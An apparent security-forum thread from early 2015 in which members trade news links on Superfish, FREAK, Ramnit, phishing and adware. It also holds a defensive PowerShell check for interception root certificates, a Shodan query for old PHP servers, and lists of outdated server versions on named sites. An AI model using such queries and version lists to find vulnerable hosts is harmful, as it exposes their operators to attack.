One single bit to break them all: http://breakingmalware.com/vulnerabilities/one-bit-rule-bypassing-windows-10-protections-using-single-bit/
polonus
-
One single bit to break them all: http://breakingmalware.com/vulnerabilities/one-bit-rule-bypassing-windows-10-protections-using-single-bit/
polonus
Which has been fixed if you've applied the latest patch Tuesday updates. :)
-
Sophisticated Phishing using free HTML-5 templates to convince:
https://labs.opendns.com/2015/02/11/paypal-phishing-sophistication-growing/
polonus
-
Sophisticated Phishing using free HTML-5 templates to convince:
https://labs.opendns.com/2015/02/11/paypal-phishing-sophistication-growing/
polonus
http://www.pcworld.com/article/2883472/many-paypal-lookalike-phishing-websites-taken-offline.html
-
Thank you, bob3160, for the update, and good that they keep an eye on this abuse. ;)
Damian
-
Quote from bob3160:
Which has been fixed if you've applied the latest patch Tuesday updates.
First MS patches came from Redmond, then from India and now land on your computer from Brazil.
polonus
-
Fake AdwCleaner generates money for cybercrime: http://www.bleepingcomputer.com/forums/t/566869/fake-adwcleaner-scareware-generates-thousands-of-dollars-for-scammers/
polonus
-
A New Twist on Tech Support Scams Pop Ups
https://blog.malwarebytes.org/fraud-scam/2015/02/a-new-twist-on-tech-support-scams-pop-ups/?utm_source=Gplus&utm_medium=social
Amazon “Notice: Ticket Number” Phish Seeks Card Details
https://blog.malwarebytes.org/fraud-scam/2015/02/amazon-notice-ticket-number-phish-seeks-card-details/?utm_source=Gplus&utm_medium=social
-
Xplode has now updated AdwCleaner to remove the imposter :)
-
F-Secure Sells Younited Personal Cloud to Synchronoss; Redoubles Security Focus
https://www.f-secure.com/en/web/press_global/news-clippings/-/journal_content/56/1075444/1179552
-
Cyber Espionage on shiniest, debunked for curious readers :)
http://www.kaspersky.com/about/news/virus/2015/equation-group-the-crown-creator-of-cyber-espionage
https://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/
https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf
-
Find Out If U.K. Spied On You Illegally Via NSA’s Prism, Upstream
http://techcrunch.com/2015/02/16/pi-did-brits-spy/#jM4aqR:T0l
-
Celebrity chef Jamie Oliver’s website hacked, redirects to exploit kit
https://blog.malwarebytes.org/exploits-2/2015/02/celebrity-chef-jamie-olivers-website-hacked-redirects-to-exploit-kit/?utm_source=Gplus&utm_medium=social
-
Lenovo PCs ship with preinstalled adware and root certificate
http://www.ghacks.net/2015/02/19/lenovo-pcs-ship-with-preinstalled-adware-and-root-certificate/
-
Lenovo PCs ship with preinstalled adware and root certificate
http://www.ghacks.net/2015/02/19/lenovo-pcs-ship-with-preinstalled-adware-and-root-certificate/
I can recall something similar from some time ago (can't recall the company making said HDDs) and that was down to new hard drives infected even before installed on new systems.
-
There is some new adware doing the rounds which employs a double driver rootkit. We are hoping that a simple removal process will be found shortly
I have asked for a copy of the dropper so I can send it to Avast
Reference Shopperz: I have a case now where I am having trouble in removing it.
I have used the following:
Take ownership reg change. This fails to run or change ownership.
Changing the driver status in services: permission denied.
Combofix cannot delete.
AVZ cannot delete.
FRST can delete from the recovery console, I believe; however, the computer MBR became corrupt and all repairs failed. Required a re-install (separate case).
I believe this driver is associated:
R1 bsdriver; C:\Windows\system32\drivers\bsdriver.sys [36344 2015-02-05] ()
But the same deletion/ownership problems as above.
There is a possible uninstall file in the folder; I am going to try that next, but do not hold out much hope.
Then, against hope, I will run TDSSKiller.
I will try FRST again from the recovery console and hope the previous MBR problem was a coincidence. But I have warned the OP.
EDIT: Forgot the link http://www.geekstogo.com/forum/topic/347348-sons-laptop-infected-maladware/page-3#entry2480622
From MBAM contact:
We have discovered that Shopperz adware is using two drivers to protect the files from being removed. That means the drivers are used as watchdogs for the Shopperz files (adware mixed with a rootkit - great...).
-
NSA and GCHQ allegedly hacked SIM vendor: https://firstlook.org/theintercept/2015/02/19/great-sim-heist/
also: https://twitter.com/AndrewDFish/status/568758179154280448
Access to core mobile networks lies open. Just remember the ease of the Blackphone hack (5 minutes) :o
How Gemalto reacted to these revelations on the AEX, a 6% loss:
http://www.beurs.nl/gemalto-koers
polonus
-
Security experts call for an end to new PC crapware installs: http://www.computerworld.com/article/2886978/security-experts-call-for-halt-to-pc-crapware-after-lenovo-debacle.html
polonus
-
Evolve Gamers Hunted by Malware
https://blog.malwarebytes.org/fraud-scam/2015/02/evolve-gamers-hunted-by-malware/?utm_source=Gplus&utm_medium=social
-
Instructions on how to uninstall SuperFish and the certificate
http://support.lenovo.com/us/en/product_security/superfish_uninstall
I don't see detection added to the vps :-\
-
Hi Eddy,
A shame :( really, as MS already has the capability to remove the Superphish adware in its virus scanners ->
http://www.microsoft.com/security/scanner/en-us/default.aspx
See: http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fSuperfish.A
polonus
-
Lenovo and the Superfish fiasco
https://blog.malwarebytes.org/privacy-2/2015/02/lenovo-and-the-superfish-fiasco/?utm_source=Gplus&utm_medium=social
-
Hi Para-Noid,
Getting harder and harder to manoeuvre around crap and junk now. We see where that brought us now!
Some good free programs started to be flagged as malcode because the additional junk could not easily enough be circumvented by the average unaware user.
I wish you all an enormous lot of less OpenCandy and what else might come your way bundled.
Hope these marketing cheap money eager mor**ns are finally gonna learn they are shooting their own big feet big time, but it is always hardest for one to admit to their own mistakes/miscalculations ;D
polonus
-
More worrisome words: https://www.eff.org/deeplinks/2015/02/further-evidence-lenovo-breaking-https-security-its-laptops
pol
-
Privdog is Superfish all over again
http://www.ghacks.net/2015/02/23/privdog-is-superfish-all-over-again/
-
Superfish introduction and removal tools and model numbers for Lenovo notebooks that suffered from having Superfish preloaded:
E-Series: E10-30
Flex-Series: Flex2 14, Flex2 15, Flex2 14D, Flex2 15D, Flex2 14 (BTM), Flex2 15 (BTM), Flex 10
G-Series: G410, G510, G40-70, G40-30, G40-45, G50-70, G50-30, G50-45
M-Series: Miix2 - 8, Miix2 - 10, Miix2 - 11
S-Series: S310, S410, S415; S415 Touch, S20-30, S20-30 Touch, S40-70
U-Series: U330P, U430P, U330Touch, U430Touch, U540Touch
Y-Series: Y430P, Y40-70, Y50-70
Yoga-Series: Yoga2-11BTM, Yoga2-11HSW, Yoga2-13, Yoga2Pro-13
Z-Series: Z40-70, Z40-75, Z50-70, Z50-75
Removal tool from the manufacturer: http://support.lenovo.com/us/en/product_security/superfish_uninstall
Information about Superfish: http://www.zdnet.com/article/microsoft-updates-windows-defender-to-remove-superfish-infection/
-
Superfish introduction and removal tools and model numbers for Lenovo notebooks that suffered from having Superfish preloaded:
E-Series: E10-30
Flex-Series: Flex2 14, Flex2 15, Flex2 14D, Flex2 15D, Flex2 14 (BTM), Flex2 15 (BTM), Flex 10
G-Series: G410, G510, G40-70, G40-30, G40-45, G50-70, G50-30, G50-45
M-Series: Miix2 - 8, Miix2 - 10, Miix2 - 11
S-Series: S310, S410, S415; S415 Touch, S20-30, S20-30 Touch, S40-70
U-Series: U330P, U430P, U330Touch, U430Touch, U540Touch
Y-Series: Y430P, Y40-70, Y50-70
Yoga-Series: Yoga2-11BTM, Yoga2-11HSW, Yoga2-13, Yoga2Pro-13
Z-Series: Z40-70, Z40-75, Z50-70, Z50-75
Removal tool from the manufacturer: http://support.lenovo.com/us/en/product_security/superfish_uninstall
Information about Superfish: http://www.zdnet.com/article/microsoft-updates-windows-defender-to-remove-superfish-infection/
I wouldn't be a bit surprised if the removal tool was created at the same time that the spying started. Just waiting to be released
when someone was caught with their hands in the cookie jar. :)
-
LOL ;D
-
Vulnerability Note VU#529496
Komodia Redirector with SSL Digestor fails to properly validate SSL and installs non-unique root CA certificates and private keys
http://www.kb.cert.org/vuls/id/529496
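An added check, not part of the CERT note or any vendor removal tool, for the condition VU#529496 describes: a non-unique interception root CA sitting in the Windows trusted root stores. The subject-name patterns are illustrative assumptions ("Superfish" is the CN the Lenovo preload used; "Komodia" and "PrivDog" are substring guesses), and the private-key test is a general heuristic, since a genuine trusted root never has its private key on the endpoint.

```powershell
# Added example (assumption: run in an elevated PowerShell 3+ session so the
# LocalMachine store is readable). Lists trusted roots that either match a
# suspect name or carry a private key in the store.
function Get-SuspectRootCA {
    [CmdletBinding()]
    param(
        [string[]]$Stores = @('Cert:\LocalMachine\Root', 'Cert:\CurrentUser\Root'),
        # Illustrative patterns; extend with whatever your inventory says is not yours.
        [string[]]$Patterns = @('Superfish', 'Komodia', 'PrivDog')
    )
    foreach ($store in $Stores) {
        Get-ChildItem -Path $store -ErrorAction SilentlyContinue | ForEach-Object {
            $cert = $_
            $reasons = @()
            $nameHit = $Patterns | Where-Object { $cert.Subject -match [regex]::Escape($_) }
            if ($nameHit) { $reasons += "subject matches '$($nameHit -join ',')'" }
            # Komodia-based products keep the key in their own files, so the name
            # match is the primary signal; a key in the store catches other locally
            # generated interception roots.
            if ($cert.HasPrivateKey) { $reasons += 'private key present in store' }
            if ($reasons.Count -gt 0) {
                [pscustomobject]@{
                    Store      = $store
                    Subject    = $cert.Subject
                    Thumbprint = $cert.Thumbprint
                    NotAfter   = $cert.NotAfter
                    Reason     = ($reasons -join '; ')
                }
            }
        }
    }
}

Get-SuspectRootCA | Format-Table -AutoSize
```

Any hit means HTTPS on that machine can be decrypted by whoever holds the shared key; remove the certificate and the software that installed it, then re-run the check.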
-
Windows SSL Interception Gone Wild
https://www.facebook.com/notes/protect-the-graph/windows-ssl-interception-gone-wild/1570074729899339
-
BEWARE SCAM!!!!!
http://www.vg247.com/2015/02/23/darkest-dungeon-windows-8-store-scam/
-
The new Google Fuzzing Bots are doing overtime and with good results:
http://googleonlinesecurity.blogspot.nl/2015/02/more-protection-from-unwanted-software.html
polonus
-
Superfish Update - An Open Letter from Lenovo CTO Peter Hortensius
http://news.lenovo.com/article_display.cfm?article_id=1932
-
Superfish Update - An Open Letter from Lenovo CTO Peter Hortensius
http://news.lenovo.com/article_display.cfm?article_id=1932
Talk about trying to understate the seriousness of the issue:
This software frustrated some users without adding value to the experience so we were in the process of removing it from our preloads.
It "frustrated some users" a real master of understatement at work.
I thought when there was this big a screw-up they got a public flogging - or worse.
-
Hi DavidR,
If that is 57.000 users I would not like to be among them,
polonus
-
maybe something good will come out of it
Now, we are in the midst of developing a concrete plan to address software vulnerabilities and security with defined actions that we will share by the end of the week. What I can say about this today is that we are exploring a wide range of options that include:
-creating a cleaner PC image (the operating system and software that is on your device right out of the box);
-working directly with users, privacy/security experts and others to create the right preload strategy quickly;
-and soliciting and assessing the opinions of even our harshest critics in evaluating our products going-forward.
a clean PC with only OS?...no crap software :)
-
Melih from Comodo also defends his position regarding Privdog:
https://forums.comodo.com/ssl-certificate/comodo-under-attack-t70990.0.html;msg798365#msg798365
-
maybe something good will come out of it
Building trust again will take some time I fear - Despite their assurances, I know Lenovo is off my list for some time. When HP abandoned updating printer drivers for a new OS, my A3 business grade printer effectively became an expensive paper weight. I vowed never to purchase another HP product and that was over 10 years ago.
Sony is in a similar boat, after their rootkit fiasco, I vowed never to buy another Sony product and I haven't. Boy is that hard given the product range they have.
Now, we are in the midst of developing a concrete plan to address software vulnerabilities and security with defined actions that we will share by the end of the week. What I can say about this today is that we are exploring a wide range of options that include:
-creating a cleaner PC image (the operating system and software that is on your device right out of the box);
-working directly with users, privacy/security experts and others to create the right preload strategy quickly;
-and soliciting and assessing the opinions of even our harshest critics in evaluating our products going-forward.
a clean PC with only OS?...no crap software :)
Well, they are still going to have an AV on board according to their article, as they say one of the first things that will happen on new systems is to run a scan to ensure there is no Superfish - or presumably any other malware.
-
Hi DavidR,
We could just have been waiting for this outcome; at long last the eager scraping for the easy bundling money is now backfiring greatly.
Will they ever learn they cannot lead the user to that same river again and again? Always the hardest thing is to recognize your own mistakes and learn from them. Not a lot of marketeers are ready to learn, only a few can. If that is so, they have to learn the hard way.
I do not pity them. Arrogance, dear DavidR, arrogance everywhere and contempt for the end-user/customer that they cannot live without.
Damian
-
Superfish Fallout Raises Privacy Concern Over Parental Control Apps
https://blog.malwarebytes.org/privacy-2/2015/02/superfish-fallout-raises-privacy-concern-over-parental-control-apps/
-
Hi mchain,
More related Android SDK malvertising.
Avast should provide proper Network Protection for it,
a typical Network Shield protection issue here.
Read: http://www.hotforsecurity.com/blog/android-malvertising-scam-promises-antivirus-delivers-lifetime-subscription-to-ringtones-7157.html link article author: Loredana Botezatu
So this sort of malcode has been with us since 2013 and now it went from bad to worse apparently.
In Avast we trust, unless we test.
polonus
-
Ramnit botnet was taken down by Europol, a cookie and password stealing botnet: http://blogs.technet.com/b/mmpc/archive/2011/05/10/little-red-ramnit-my-what-big-eyes-you-have-grandma.aspx
polonus
-
A not so bright ;D cybercriminal that infested himself: https://blogs.rsa.com/zeus-toolkit-infected-ramnit-worm/
polonus
-
Advertisement data collected by drone: https://adnear.com/february2015/experimenting-with-drones-for-data-collection.php
polonus
-
Advertisement data collected by drone: https://adnear.com/february2015/experimenting-with-drones-for-data-collection.php
polonus
Some of the UK Telecom/Mobile/Internet providers are already considering the use of drones to fill in gaps in the mast network using wifi capable drone repeaters.
-
I am with you there, and in the light of the alleged Gemalto heist in the Netherlands, you should be extra watchful when you now come near Dutch Parliament in The Hague, for instance - all parliament members will get free new Vodafone SIM cards handed out. We normal citizens have to pay approx. 20 euros to get a new one. Read: http://electrospaces.blogspot.nl/2015/02/nsa-and-gchq-stealing-sim-card-keys-few.html
polonus
-
Security Advisory – WP-Slimstat 3.9.5 and lower
http://blog.sucuri.net/2015/02/security-advisory-wp-slimstat-3-9-5-and-lower.html
-
What is malvertising?
https://blog.malwarebytes.org/malvertising-2/2015/02/what-is-malvertising/?utm_source=Gplus&utm_medium=social
Philippine .Gov Compromised by Anti-ISIS Defacement, Phishing
https://blog.malwarebytes.org/hacking-2/2015/02/philippine-gov-compromised-by-anti-isis-defacement-phishing/?utm_source=Gplus&utm_medium=social
-
Google will set out slow sites: /google-testing-red-slow-label-search-results-slower-sites-215483
Link author Search Engine Land's Barry Schwartz.
But google sites themselves are slow: https://plus.google.com/+NeerajKumarKNKayastha/posts/AxqES5eq6Gg
link article by K Neeraj Kayastha SEO expert.
polonus
-
Almost 50% increase in reported vulnerabilities as non-Windows operating systems lead the table
https://www.virusbtn.com/blog/2015/02_25.xml
-
Coordinated action takes down Ramnit botnet infrastructure
https://www.virusbtn.com/blog/2015/02_26.xml
-
Hi Pondus,
Did you miss this? Re: https://forum.avast.com/index.php?topic=52252.msg1187513#msg1187513
Damian
-
Websites hacked by a review, alas we are not being told how the websites were being compromised: https://blog.shodan.io/tracking-hacked-websites/
Just have to wait for the appropriate ninja fw report? https://www.google.nl/webhp?sourceid=chrome-instant&ion=1&espv=2&es_th=1&ie=UTF-8#q=ninja+firewall+report
What queries may deliver as results on Shodan, see example
-> https://www.shodan.io/search?query=PHP%2F5.3.28-1~dotdeb.0
(the limit is just your fantasy - mind you have recent day's results - chikagoro)
polonus
-
Useful site to detect Superfish, Komodia, PrivDog and similar cripplewares disabling SSL
https://filippo.io/Badfish/
-
Deceiving cPanel ‘Account Suspended’ page serves exploits
https://blog.malwarebytes.org/exploits-2/2015/02/deceiving-cpanel-account-suspended-page-serves-exploits/?utm_source=Gplus&utm_medium=social
Netflix Phish Rehash Polices Its Visitors
https://blog.malwarebytes.org/fraud-scam/2015/02/netflix-phish-rehash-polices-its-visitors/?utm_source=Gplus&utm_medium=social
It's coming to the point where no website is entirely safe!
-
Lenovo Swears All Its Windows 10 PCs Will Be Completely Clean
http://news.softpedia.com/news/Lenovo-Swears-All-Its-Windows-10-PCs-Will-Be-Completely-Clean-474514.shtml
-
@Para-Noid and others,
Certification, what we can still trust and what we cannot trust.
Read here about CrazyDomains' absolute incompetence...and the shivers will go down your backbone: http://forums.whirlpool.net.au/archive/1637512
and also read this about new computers and junk - do a complete re-install: https://www.eff.org/deeplinks/2015/02/dear-software-vendors-please-stop-trying-intercept-your-customers-encrypted
polonus
-
Paranoia Personified - If all of this worries you,
Stop Using The Internet. :)
-
Lenovo promises bloatware-free PCs, free McAfee subscriptions for Superfish victims
http://www.extremetech.com/computing/199997-lenovo-promises-bloatware-free-pcs-free-mcafee-subscriptions-for-superfish-victims
-
MS pays Google in the bundle war to get its apps prominently on Android, but also cashes in: http://www.theverge.com/2013/4/17/4233468/microsoft-and-foxconn-sign-android-chrome-patent-licensing-deal
pol
-
European Europol action against Ramnit botnet became a fail: http://news.drweb.com/show/?i=9310&lng=en&c=5
polonus
-
Antivirus Maker Avast Is Latest Overseas Tech Firm Blocked In China
http://techcrunch.com/2015/03/02/avast-blocked-in-china/
-
Google is going to decide what information will be trustworthy: http://arxiv.org/abs/1502.03519v1
Link article poster = Xin Luna Dong.
The future for alternative information media websites and even satirical websites seems bleak.
The days of BigBrother's newspeak to arrive?
polonus
-
Weak encryption in SSL comes back to bite us: http://www.washingtonpost.com/blogs/the-switch/wp/2015/03/03/freak-flaw-undermines-security-for-apple-and-google-users-researchers-discover/
I stumbled upon this because our forum member, Eddy, made me aware of this threat: https://freakattack.com/
Thanks, Eddy, for the heads up on this.
So Mozilla came up with this: https://mozilla.github.io/server-side-tls/ssl-config-generator/
Here you see such a weak encryption site being alerted: https://ssltools.websecurity.symantec.com/checker/views/certCheck.jsp (check: librus.pl)
Hi folks, the world of Interwebs becomes a more and more insecure place for us. ;D
polonus
-
A Week in Security (Feb 22 – 28)
https://blog.malwarebytes.org/online-security/2015/03/a-week-in-security-feb-22-28/?utm_source=Gplus&utm_medium=social
Yet Another Cleaner, Yet Another Stealer
https://blog.malwarebytes.org/fraud-scam/2015/03/yet-another-cleaner-yet-another-stealer/?utm_source=Gplus&utm_medium=social
-
I have been removing YAC for nearly a year now :)
-
Dear avast support forum users.
Threat of being tracked, where you least expect it. Look before you leap - always!
Aware of our forum members DavidR's worries about HTTPS-Everywhere and my analyzing of HTTPS Everywhere re-writes, I did some research on additional tracker threats where one should least expect it,
namely on a Dutch zimbra-driven https webmail website.
The results were shocking, folks. For more info read here:
https://forum.avast.com/index.php?topic=166044.msg1190258#msg1190258 and here: https://forum.avast.com/index.php?topic=167274.0
Whoever wants to read more and explore these issues themselves, read my posting here:
https://forum.avast.com/index.php?topic=166044.msg1190259#new
polonus (volunteer website security analyst and website error-hunter)
-
New security coming to Mozilla's firefox: https://blog.mozilla.org/security/2015/03/03/revoking-intermediate-certificates-introducing-onecrl/
polonus
-
Defaced websites form an extended risk to also become infested with malware
http://killmalware.com/ gives a lot of new defaced websites.
These websites should also be checked against malcode.
polonus
-
Google does not want to respect European law decisions considering the Right To Be Forgotten and therefore makes it harder now to reach their dot com pages from outside the US, Read: http://searchengineland.com/google-harder-to-reach-outside-us-215845 link article author = Danny Sullivan.
US criticism: http://www.nytimes.com/2015/02/04/opinion/europes-expanding-right-to-be-forgotten.html?_r=0
polonus
-
Does Google quietly help NSA by backing away from encryption by default? Seems so: http://arstechnica.com/gadgets/2015/03/google-quietly-backs-away-from-encrypting-new-lollipop-devices-by-default/
polonus
P.S. with an interesting discussion on the why's: http://www.reddit.com/r/Android/comments/2xoo3v/google_quietly_backs_away_from_encrypting_new/
D
-
Was it all worth it? Re: http://www.forbes.com/sites/thomasbrewster/2015/02/27/lenovo-got-very-little-fr
Link article author = Thomas Fox-Brewster
polonus
-
Stop!t: The Newest App To Curb Cyberbullying
https://blog.malwarebytes.org/online-security/2015/03/stopt-the-newest-app-to-curb-cyberbullying/?utm_source=Gplus&utm_medium=social
Bogus Search Engine Leads to Exploits
https://blog.malwarebytes.org/online-security/2015/02/bogus-search-engine-leads-to-exploits/?utm_source=Gplus&utm_medium=social
I use Google+ to get these notifications.
-
Microsoft OS's also vulnerable to the FREAK bug.
https://technet.microsoft.com/en-us/library/security/3046015
-
Microsoft Windows vulnerable to 'FREAK' encryption flaw too
http://www.cnet.com/news/windows-vulnerable-to-freak-encryption-flaw-too/
-
uTorrent Quietly Installs Cryptocurrency Miner, Users Complain
http://torrentfreak.com/utorrent-quietly-installs-riskware-bitcoin-miner-users-report-150306/
uTorrent bundles Bitcoin Miner, time for some alternatives
http://www.ghacks.net/2015/03/06/utorrent-bundles-bitcoin-miner-time-for-some-alternatives/
-
Hi abruptum,
This now only available via Google Cache: https://webcache.googleusercontent.com/search?q=cache:ESJf5_i1apQJ:forum.utorrent.com/topic/95041-warning-epicscale-riskware-silently-installed-with-latest-utorrent/+&cd=1&hl=nl&ct=clnk&gl=nl also see: http://i.imgur.com/ohDf3C1.png
polonus
-
A question about something I do not understand?
I see sites that are being banned for PHISHing also by Google Safebrowsing.
Why are these same sites NOT banned from the Google Adsense Program?
Like to see an example: http://vnseo.com/497-health.slim-figure-for-you.org
Anyone?
polonus
-
Just a guess...
Two different departments, not communicating with each-other.
-
A question about something I do not understand?
I see sites that are being banned for PHISHing also by Google Safebrowsing.
Why are these same sites NOT banned from the Google Adsense Program?
Like to see an example: http://vnseo.com/497-health.slim-figure-for-you.org
Anyone?
Best, you ask Google. ;)
-
Avast is definitely alerting the site.
-
Alert Confirmed:
-
Attacks with malicious macros concealed in XML files:
https://www.trustwave.com/Resources/SpiderLabs-Blog/Attackers-concealing-malicious-macros-in-XML-files/ article posted by Rodel Mendrez
polonus
-
A Week in Security (Mar 01 – 07)
https://blog.malwarebytes.org/online-security/2015/03/a-week-in-security-mar-01-07/?utm_source=Gplus&utm_medium=social
-
Various online website security scanners run on outdated server software.
Zulu Zscaler has a problem: HTTP Server: Apache HTTP Server 2.2.14
Operating System: Ubuntu 10.04 LTS (Lucid Lynx)
Phusion Passenger Version: 3.0.11 (Outdated)
urlquery dot net has a problem: HTTP Server: Apache HTTP Server 2.2.22 (Outdated)
Operating System: Ubuntu 12.10 (Quantal Quetzal) (Unsupported)
PHP Version: 5.4.6-1ubuntu1.8 (Outdated)
DrWeb has a problem: HTTP Server: nginx 0.7.67 (Outdated)
evuln.com/tools/malware-scanner: HTTP Server: nginx 1.0.15 (Outdated)
Hey, who is working that IT there? Well, do you guys take your job seriously? ;D
polonus
-
You should still be cautious with Lenovo:
http://www.extremetech.com/computing/200731-not-so-superfish-al-lenovo-still-shipping-infected-systems-as-customers-grapple-with-removal
-
Hi ehmen,
It is very hard to quit as a habit, bundling junkware!
polonus
-
Hi ehmen,
It is very hard to quit as a habit, bundling junkware!
polonus
But it's easy to quit buying from junkware bundlers.
-
Excellent reply and advice ehmen. :)
-
Another online scanner website with a server update problem: http://scanurl.net/
HTTP Server: nginx 1.4.0 (Outdated)
The risk involved: So let’s add up the risks and hidden dangers of outdated technology:
Increased security threats and vulnerabilities
Hard drive failures leading to possible catastrophic data loss
Bit rot leading to data corruption
Software rot leading to instability, increased downtime, and loss of productivity
Loss of competitiveness
Lower IT flexibility
Limited responsiveness to the organization
Quote from Cole Humphreys in a Tweet on CLOUD INDUSTRY INSIGHTS.
polonus
-
Canary Watch oversight: https://canarywatch.org/
The use of Canary Watch alerts may get websites in a corner they do not wanna be in,
just my humble opinion.
polonus
-
Excellent reply and advice ehmen. :)
;)
-
If you thought you were safe from the FREAK attack on a Windows computer, think again.
http://www.cnet.com/news/windows-vulnerable-to-freak-encryption-flaw-too/
-
ehmen is right, read here: http://thehackernews.com/2015/03/freak-openssl-vulnerability.html
link article author = Mohit Kumar
And a link to the freak testing tool: https://tools.keycdn.com/freak
polonus
-
Chrome users should make sure they have the newly released version 41 to be immune to the FREAK attack.
-
Another online scanner website with a server update problem: http://scanurl.net/
HTTP Server: nginx 1.4.0 (Outdated)
The risk involved: So let’s add up the risks and hidden dangers of outdated technology:
Increased security threats and vulnerabilities
Hard drive failures leading to possible catastrophic data loss
Bit rot leading to data corruption
Software rot leading to instability, increased downtime, and loss of productivity
Loss of competitiveness
Lower IT flexibility
Limited responsiveness to the organization
Quote from Cole Humphreys in a Tweet on CLOUD INDUSTRY INSIGHTS.
polonus
Pol,
Glad you are looking into this. [EDIT:] Scintillating work.
-
Exploiting the DRAM rowhammer bug to gain kernel privileges
http://googleprojectzero.blogspot.de/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
GOOGLERS’ EPIC HACK EXPLOITS HOW MEMORY LEAKS ELECTRICITY
http://www.wired.com/2015/03/google-hack-dram-memory-electric-leaks/
Cutting-edge hack gives super user status by exploiting DRAM weakness
http://arstechnica.com/security/2015/03/cutting-edge-hack-gives-super-user-status-by-exploiting-dram-weakness/
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1426086487419-88181.png) Yet Another Cleaner, Yet Another Stealer:
https://blog.malwarebytes.org/fraud-scam/2015/03/yet-another-cleaner-yet-another-stealer/
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1426086487419-88181.png) Yet Another Cleaner, Yet Another Stealer:
https://blog.malwarebytes.org/fraud-scam/2015/03/yet-another-cleaner-yet-another-stealer/
Shame on Elex do Brasil Participações Ltda Technology Inc. here in Brazil...
Alright, so it looks like Yet Another Cleaner is straight up stealing our detection database and modifying it for their own means. Based on the fact that they only detected a very small portion of the tons of malware we had both YAC and MBAM scan, their scanner apparently uses a slimmed down version of the one utilized by Malwarebytes Anti-Malware. We also know this because we actually analyzed a memory snapshot of their software in action.
-
One must hope he's not on the malwarenet:
http://www.computerweekly.com/feature/The-security-threats-of-technology-ubiquity
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1426086487419-88181.png) Yet Another Cleaner, Yet Another Stealer:
https://blog.malwarebytes.org/fraud-scam/2015/03/yet-another-cleaner-yet-another-stealer/
You're a bit late Bob, Para-Noid beat you to it https://forum.avast.com/index.php?topic=52252.msg1192410
-
That's because Para-Noid got his info from the horse's mouth which I obviously overlooked.
My info came from a third party. :)
-
‘Equation Group’ hackers tied to NSA after new Kaspersky Labs report surfaces
http://rt.com/usa/239933-equation-group-nsa-links-backsnarf/
New smoking gun further ties NSA to omnipotent “Equation Group” hackers
http://arstechnica.com/security/2015/03/new-smoking-gun-further-ties-nsa-to-omnipotent-equation-group-hackers/
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1426166716406-81848.png)
Panda antivirus labels itself as malware, then borks EVERYTHING – (http://www.theregister.co.uk/2015/03/11/panda_antivirus_update_self_pwn/)
Users are strongly advised not to restart their computer until a fix is available.
( It can happen at any company :'( )
-
for those interested in computer viruses ;)
http://map.ipviking.com/
http://cybermap.kaspersky.com/
http://worldmap3.f-secure.com/
https://www.fireeye.com/cyber-map/threat-map.html
http://www.digitalattackmap.com/#anim=1&color=0&country=ALL&list=0&time=16508&view=map
-
for those interested in computer viruses ;)
http://map.ipviking.com/
http://cybermap.kaspersky.com/
http://worldmap3.f-secure.com/
Interesting. According to Kaspersky, Croatia is the 99th most-attacked country. Pretty safe place.
-
Hi abruptum,
Probably because they apparently only have two bad URLs in Croatia. :o
AS Name: SBIS-AS AS for SBIS-AS
IPs allocated: 3895808
Blacklisted URLs: 2
and a lot of live and up malware ;D: http://support.clean-mx.de/clean-mx/viruses?as=AS7132
Example: http://urlquery.net/report.php?id=1425644727571
polonus
-
Facebook/Fraud Scam
https://blog.malwarebytes.org/fraud-scam/2015/03/new-facebook-worm-variant-leverages-multiple-cloud-services/?utm_source=facebook&utm_medium=social
-
Fake CS:GO Lounge Phishes Steam Creds, Drops Malware
https://blog.malwarebytes.org/fraud-scam/2015/03/fake-csgo-lounge-phishes-steam-creds-drops-malware/?utm_source=Gplus&utm_medium=social
Do you really want an Apple Watch that bad?
https://blog.malwarebytes.org/privacy-2/2015/03/apple-watch-giveaway-spam-clocks-in-on-twitter/?utm_source=Gplus&utm_medium=social
-
The majority of criminal botnet servers are being hosted in the USA (over 35%) with Taiwan as a good second (almost 15%). See this Trendmicro trendlabs report on C&C servers: http://blog.trendmicro.com/trendlabs-security-intelligence/investigating-and-detecting-command-and-control-servers/
Cryptolocker is by far the favorite cybercrime malware from CRILOCK servers today.
polonus
-
Second time around: https://blog.malwarebytes.org/exploits-2/2015/03/jamieoliver-com-still-compromised-now-drops-digitally-signed-malware/ link article author = JÉRÔME SEGURA.
polonus
-
BSides Austin 2015 and Malware Analysis Training
https://blog.malwarebytes.org/intelligence/2015/03/bsides-austin-2015-and-malware-analysis-training/?utm_source=Gplus&utm_medium=social
-
just Bull**** .... or?
USB bomb http://gizmodo.com/this-shifty-usb-drive-is-rigged-to-fry-your-computer-1691026394
Translate http://kukuruku.co/hub/diy/usb-killer
Russian http://habrahabr.ru/post/251451/
-
just Bull**** .... or?
USB bomb http://gizmodo.com/this-shifty-usb-drive-is-rigged-to-fry-your-computer-1691026394
Translate http://kukuruku.co/hub/diy/usb-killer
Russian http://habrahabr.ru/post/251451/
Why not get one and see if you can be #130 :)
-
Microsoft Security Advisory 3046310 - Improperly Issued Digital Certificates Could Allow Spoofing
https://technet.microsoft.com/en-us/library/security/3046310.aspx
-
A backup regimen is now even more vital
File infecting polymorphic crypto ransomware
http://www.v3.co.uk/v3-uk/news/2399602/hackers-developing-file-infecting-virlock-ransomware-with-resurrection-powers
-
“Cracked” Minecraft? PUP Installer
https://blog.malwarebytes.org/online-security/2015/03/cracked-minecraft-pup-installer/?utm_source=Gplus&utm_medium=social
50+ Internet Security Tips & Tricks from Top Experts
https://heimdalsecurity.com/blog/security-experts-roundup/
A Week in Security (Mar 08 – 14)
https://blog.malwarebytes.org/online-security/2015/03/a-week-in-security-mar-08-14/?utm_source=Gplus&utm_medium=social
-
50+ Internet Security Tips & Tricks from Top Experts
https://heimdalsecurity.com/blog/security-experts-roundup/
https://heimdalsecurity.com/blog/security-experts-roundup/#comment-1902836552
-
The Company Securing Your Internet Has Close Ties to Russian Spies
www.bloomberg.com/news/articles/2015-03-19/cybersecurity-kaspersky-has-close-ties-to-russian-spies
-
Hi Pondus,
Always present two sides of the coin.
That was the one side of the story,
here is the other and then let those that have read this all
just decide for themselves what they want to believe,
I think that is the only fair presentation:
http://eugene.kaspersky.com/2015/03/20/a-practical-guide-to-making-up-a-sensation/
